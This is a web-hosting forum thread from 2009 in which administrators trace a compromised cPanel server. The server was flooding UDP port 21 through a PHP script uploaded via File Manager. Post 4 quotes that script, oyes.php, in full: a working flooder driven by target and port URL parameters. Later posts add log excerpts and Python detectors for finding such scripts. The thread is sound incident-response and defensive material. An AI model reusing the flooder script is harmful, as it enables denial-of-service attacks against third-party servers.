The Community Forums


Spewing UDP traffic

Discussion in 'General Discussion' started by fragbait, Sep 15, 2009.

  1. fragbait

    fragbait Member

    Joined:
    Nov 4, 2007
    Messages:
    5
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    wairarapa
    Anyone come across this problem?

    I have a WHM server that in the last three days has been spewing UDP packets to port 21 on receiving locations. Not all the time, but a real pain in the rear.
    I have had to put in an iptables rule to stop the server sending traffic on port 21, protocol UDP.

    Using wireshark I saw no act that started the traffic, just that thousands of UDP packets left my server for port 21 on the receiving server, and the receiving server of course never responded to any of the packets.

    It would appear that I am being used for a DOS attack against these servers, anyone come across anything similar?

    I have stopped the process, but now want to find the smoking gun.
    Thanks in advance
     
  2. MattCurry

    MattCurry Well-Known Member

    Joined:
    Aug 18, 2009
    Messages:
    275
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Houston, Tx
    Hello,


    I am sorry to hear you are having issues, however with this being possibly malicious I would recommend that you contact your data center to see if they can help you track down the source of this issue. Please let me know if you have any other questions.

    Thank you,
    Matthew Curry
     
  3. fragbait

    fragbait Member

    Joined:
    Nov 4, 2007
    Messages:
    5
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    wairarapa
    Spewing UDP Packets

    We are a small organisation and I am the "data center". I am backtracking and have run rootkit detectors to try and find how they got in and where, but have found nothing so far.

    So I am working from the simple reality that my server was spewing out thousands of identical UDP packets at other servers in the world. Being UDP, my server is not expecting any reply from the IP getting spewed at. Nor is one seen. Therefore I am trying to see what is triggering and controlling the flood.

    Nothing found so far. And my server was recently patched before this happened.
     
  4. fragbait

    fragbait Member

    Joined:
    Nov 4, 2007
    Messages:
    5
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    wairarapa
    More info on spewing UDP

    This server of mine got hacked; how, I am not too sure. Possibly an injection with cPanel?

    At the same time as this happened:
    Code:
    Sep 12 20:15:49 web Cp-Wrap[2531]: Pushing "649 GETDOMAINIP xxxxxxx.xx.xx " to '/usr/local/cpanel/bin/apacheadmin' for UID: 649
    Sep 12 20:15:49 web Cp-Wrap[2531]: CP-Wrapper terminated without error
    Sep 12 20:15:49 web Cp-Wrap[2534]: Pushing "649 LISTSUBDOMAINS 0 " to '/usr/local/cpanel/bin/apacheadmin' for UID: 649
    Sep 12 20:15:49 web Cp-Wrap[2534]: CP-Wrapper terminated without error
    Sep 12 20:15:49 web Cp-Wrap[2536]: Pushing "649 LISTMULTIPARKED 0 " to '/usr/local/cpanel/bin/apacheadmin' for UID: 649
    Sep 12 20:15:49 web Cp-Wrap[2536]: CP-Wrapper terminated without error
    Sep 12 20:15:49 web Cp-Wrap[2538]: Pushing "649 COUNTDBS" to '/usr/local/cpanel/bin/mysqladmin' for UID: 649
    Sep 12 20:15:49 web Cp-Wrap[2538]: CP-Wrapper terminated without error
    Sep 12 20:15:49 web Cp-Wrap[2542]: Pushing "649 GETDISK" to '/usr/local/cpanel/bin/mysqladmin' for UID: 649
    Sep 12 20:15:50 web Cp-Wrap[2542]: CP-Wrapper terminated without error
    Sep 12 20:15:50 web Cp-Wrap[2549]: Pushing "649 LISTSTORE 0 0 " to '/usr/local/cpanel/bin/ftpadmin' for UID: 649
    Sep 12 20:15:50 web Cp-Wrap[2549]: CP-Wrapper terminated without error
    
    This file appeared on the customer's xxxxxxx.xx.xx website:
    -rw-r--r-- 1 eastern eastern 418 Sep 12 20:16 oyes.php

    containing
    Code:
    <?php
    
    if(!$_GET['target'])
    {
    die('');
    }
    
    $target = $_GET['target'];
    
    if(!$_GET['port'])
    {
    die('');
    }
    
    $port = $_GET['port'];
    
    $sock=socket_create(AF_INET,SOCK_DGRAM,SOL_UDP);
    
    if(!$sock) die("Cant Create Socket!!!");
    
    $data='';
    for($i=0;$i<1400;$i++)
    {
    $data.=chr(rand(0,255));
    }
    
    while(true)
    {
    if(!socket_sendto($sock,$data,strlen($data),0,$target,$port)) die("Error SendTo!!!");
    }
    
    ?>
    
    This was injected from 66.90.103.27, I have already contacted them to see what they may have to say.

    After the injection of this php file a different IP address then started sending requests to this PHP file such as this:
    Code:
    208.38.181.149 - - [16/Sep/2009:04:46:29 +1200] "GET /oyes.php?target=70.84.89.186&port=21 HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9.1"
    
    I am basically writing this to make people aware. I have cleaned up the problem and stopped the possibility of UDP packets being spewed from this server, but my bigger concern is I do not know definitively how they got in.

    I don't think it was a password hack, but neither does a crafted cPanel attack seem likely as it was so surgical.
    Anyone got any ideas?
     
  5. d_t

    d_t Well-Known Member

    Joined:
    Sep 20, 2003
    Messages:
    243
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    Bucharest
    Same problem, same script (oyes.php), same IP:

    Code:
    grep 66.90.103.27 /usr/local/cpanel/logs/access_log | grep POST
    66.90.103.27 proxy X [09/12/2009:06:21:04 -0000] "POST /frontend/x2/files/doupload.html HTTP/1.1" 200 0 "http://cpanel.XXX.XX/frontend/x2/files/upload.html?dir=%2fhome%2fXXX%2fpublic_html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.43 Safari/530.5"
    The attack was on UDP port 21. I'm not sure yet if the password was stolen or there is a problem with cPanel authentication using proxy. If I find out, I'll let you know. [the client user/domain was replaced with X]
     
  6. fragbait

    fragbait Member

    Joined:
    Nov 4, 2007
    Messages:
    5
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    wairarapa
    Cpanel insertion

    Thanks DT

    I did a look
    Code:
    grep 66.90.103.27 /usr/local/cpanel/logs/access_log | grep POST
    
    and found this
    Code:
    66.90.103.27 - xxxxxx[09/12/2009:07:47:53 -0000] "POST /frontend/x/files/doupload.html HTTP/1.1" 200 0 "http://xx.xx.xx.xx:2082/frontend/x/files/upload.html?dir=%2fhome%2fxxxxxx%2fpublic_html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.43 Safari/530.5"
    66.90.103.27 - xxxxxx [09/12/2009:08:16:10 -0000] "POST /frontend/x/files/doupload.html HTTP/1.1" 200 0 "http://xx.xx.xx.xx:2082/frontend/x/files/upload.html?dir=%2fhome%2fxxxxxx%2fpublic_html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.43 Safari/530.5"
    
    So injection or password hacked?
    The .lastlogin file did have their IP address in it. Could this only happen if they did log on?
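    Added example, not code from any poster: a Python pass over constructed log lines in the shape quoted in posts 4, 5 and 6. It pulls out the `?target=&port=` hits that steer the flooder and the File Manager `doupload.html` POSTs that dropped it, so the two can be lined up by time and source address. The sample lines, the `someuser` account and the documentation-range IPs are all constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in the shape of the logs quoted in the thread;
# the addresses are documentation ranges, not the ones from the posts.
APACHE_LOG = """\
203.0.113.9 - - [16/Sep/2009:04:46:29 +1200] "GET /oyes.php?target=192.0.2.77&port=21 HTTP/1.1" 200 241 "-" "Mozilla/5.0"
203.0.113.9 - - [16/Sep/2009:04:47:01 +1200] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.4 - - [16/Sep/2009:05:02:13 +1200] "GET /q.php?target=192.0.2.78&port=21 HTTP/1.1" 200 241 "-" "curl/7.19"
"""
CPANEL_LOG = """\
198.51.100.20 - someuser [09/12/2009:07:47:53 -0000] "POST /frontend/x/files/doupload.html HTTP/1.1" 200 0 "http://host:2082/frontend/x/files/upload.html?dir=%2fhome%2fsomeuser%2fpublic_html" "Mozilla/5.0"
198.51.100.20 - someuser[09/12/2009:08:16:10 -0000] "POST /frontend/x/files/doupload.html HTTP/1.1" 200 0 "http://host:2082/frontend/x/files/upload.html?dir=%2fhome%2fsomeuser%2fpublic_html" "Mozilla/5.0"
192.0.2.200 - someuser [09/12/2009:09:00:00 -0000] "GET /frontend/x/index.html HTTP/1.1" 200 0 "-" "Mozilla/5.0"
"""
# Apache combined: ip ident user [time] "method path proto" status ...
APACHE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
# cPanel access_log: ip proxy user[time] "method path proto" status bytes "referer" ...
CPANEL_RE = re.compile(r'^(\S+) \S+ (\S+?)\s*\[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)"')

def find_flood_triggers(apache_text):
    """Hits on .php scripts given both target= and port=, the flooder's control interface."""
    hits = []
    for line in apache_text.splitlines():
        m = APACHE_RE.match(line)
        if not m:
            continue
        ip, when, _method, path, status = m.groups()
        url = urlsplit(path)
        qs = parse_qs(url.query)
        if url.path.endswith(".php") and "target" in qs and "port" in qs:
            hits.append({"client": ip, "time": when, "script": url.path,
                         "target": qs["target"][0], "port": qs["port"][0], "status": status})
    return hits

def find_filemanager_uploads(cpanel_text):
    """File Manager upload POSTs (doupload.html) with the directory they were aimed at."""
    uploads = []
    for line in cpanel_text.splitlines():
        m = CPANEL_RE.match(line)
        if not m or m.group(4) != "POST" or "/files/doupload.html" not in m.group(5):
            continue
        target_dir = parse_qs(urlsplit(m.group(7)).query).get("dir", [""])[0]
        uploads.append({"client": m.group(1), "user": m.group(2), "time": m.group(3), "dir": target_dir})
    return uploads

def uploads_from_unknown_ips(uploads, known_ips):
    """Uploads from any address the account owner does not normally log in from."""
    return [u for u in uploads if u["client"] not in known_ips]
```

    Run the two finders over the real /usr/local/cpanel/logs/access_log and the account's Apache log, then compare each upload's time and directory with the mtime of the dropped file. In the thread's own numbers that comparison lines up once the zone is converted: oyes.php is stamped 20:16 local on a +1200 server, which is 08:16 UTC, the same minute as the second doupload.html POST in post 6.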
     
  7. netearth

    netearth Registered

    Joined:
    Sep 27, 2007
    Messages:
    4
    Likes Received:
    0
    Trophy Points:
    1
    Hi there,

    We just found one of these too, filename is q.php

    Contents are the same.

    We, like you, are trying to see how it was injected. I assume the /frontend/x2/files/doupload.html is secure - I only ask as there is very little comment from cPanel?

    Chris
     
  8. hostultra

    hostultra Well-Known Member

    Joined:
    Aug 21, 2002
    Messages:
    167
    Likes Received:
    0
    Trophy Points:
    16
    Check your Apache access logs for the first hit from that IP.
    If nothing is found, check that user's access log for anything suspicious.

    Did your user write his cPanel password in a PHP config.php file for MySQL?
    A lot of users do this instead of creating a separate MySQL user.
    It means any PHP vulnerability gives away the user's cPanel password.

    Allowing PHP sockets is a bad idea; consider removing it if you do not need it.
    It's not a default PHP module, and you don't need the PHP sockets module to use fsockopen or cURL, which most scripts that make remote connections use.
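    Added example, not hostultra's code: a Python check that turns the advice above into something you can run over a document root and a php.ini. It scores a PHP source for the signature of the flooder quoted in post 4 (ext/sockets, SOCK_DGRAM, an endless socket_sendto loop, a target taken from the request) and reports which socket functions a php.ini leaves outside `disable_functions`; that directive is an alternative I am adding alongside the module removal the post recommends. The sample source, the benign client and the ini fragment are constructed.

```python
import re

# Signatures from the flooder quoted earlier in the thread: ext/sockets, a UDP
# datagram socket, an unbounded send loop and a destination chosen by the
# HTTP caller. Any one alone is weak; the combination is the tell.
INDICATORS = [
    ("ext_sockets", re.compile(r"\bsocket_create\s*\(")),
    ("udp_datagram", re.compile(r"\bSOCK_DGRAM\b")),
    ("send_loop", re.compile(r"while\s*\(\s*(true|1)\s*\)[^}]*\bsocket_send(to)?\s*\(", re.S)),
    ("caller_controlled_target",
     re.compile(r"\$_(GET|POST|REQUEST)\s*\[\s*[\"'](target|host|ip|port)[\"']")),
]

def flood_indicators(php_source):
    """Names of the indicators present in one PHP file's source, in INDICATORS order."""
    return [name for name, rx in INDICATORS if rx.search(php_source)]

def looks_like_udp_flooder(php_source):
    """True when the file both opens a UDP socket and sends from an endless loop."""
    found = flood_indicators(php_source)
    return "udp_datagram" in found and "send_loop" in found

# ext/sockets functions that originate traffic. Removing the module is the
# post's advice; listing them in disable_functions is the fallback checked here.
SOCKET_FUNCS = {"socket_create", "socket_connect", "socket_send", "socket_sendto", "socket_write"}

def undisabled_socket_functions(ini_text):
    """Socket functions that a php.ini fragment leaves callable from PHP."""
    disabled = set()
    for line in ini_text.splitlines():
        line = line.split(";", 1)[0].strip()          # drop ini comments
        if line.startswith("disable_functions"):
            value = line.partition("=")[2]
            disabled |= {f.strip() for f in value.split(",") if f.strip()}
    return sorted(SOCKET_FUNCS - disabled)

# Constructed samples: the thread's script condensed to its shape, a benign
# fsockopen client, and a php.ini fragment that only disables socket_create.
SAMPLE_SUSPECT = ("<?php $t=$_GET['target']; $p=$_GET['port']; "
                  "$s=socket_create(AF_INET,SOCK_DGRAM,SOL_UDP); "
                  "while(true){ socket_sendto($s,$d,strlen($d),0,$t,$p); }")
SAMPLE_BENIGN = "<?php $fp=fsockopen('www.example.com',80); fwrite($fp,'GET / HTTP/1.0'); fclose($fp);"
SAMPLE_INI = "; constructed fragment\ndisable_functions = exec,passthru,socket_create\n"
```

    Apply `looks_like_udp_flooder` to the contents of each .php file under the accounts' public_html directories; a benign fsockopen or cURL client trips none of the indicators, which is the point of hostultra's distinction.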
     
  9. jenlepp

    jenlepp Well-Known Member

    Joined:
    Jul 4, 2005
    Messages:
    116
    Likes Received:
    2
    Trophy Points:
    18
    Location:
    Liberty Hill, TX
    cPanel Access Level:
    DataCenter Provider
    Did anyone ever find how these got in? Just found one on a user site and diving now, but I was curious if anyone narrowed it down.
     